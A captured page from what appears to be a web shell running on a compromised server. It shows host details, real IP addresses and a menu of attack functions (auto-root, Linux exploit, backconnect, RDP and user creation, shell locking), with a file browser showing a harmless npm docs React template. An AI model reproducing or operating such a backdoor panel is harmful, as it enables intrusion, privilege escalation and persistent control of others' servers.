Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
node_modules /
npm /
docs /
src /
templates /
[ HOME SHELL ]
Name
Size
Permission
Action
Page.js
960
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Page.js
import React from 'react' import {graphql} from 'gatsby' import styled from 'styled-components' import FoundTypo from 'src/components/FoundTypo' import Scripts from 'src/components/scripts' const version = require('../../../package.json').version const Content = styled.div` max-width: 760px; margin: auto; padding: 0 30px 120px; ` const Page = ({data}) => { const pageData = data.markdownRemark const html = pageData.html.replace(/@VERSION@/g, version) .replace(/(npm-)+([a-zA-Z\\.-]*)(\((1|5|7)\))<\/h1>/, 'npm $2</h1>') .replace(/([a-zA-Z\\.-]*)(\((1|5|7)\))<\/h1>/, '$1</h1>') return ( <Content className='documentation'> <div dangerouslySetInnerHTML={{ __html: html }} /> <FoundTypo /> <Scripts /> </Content> ) } export default Page export const query = graphql` query($slug: String!) { markdownRemark(fields: { slug: { eq: $slug } }) { html fields { slug } } } `
Close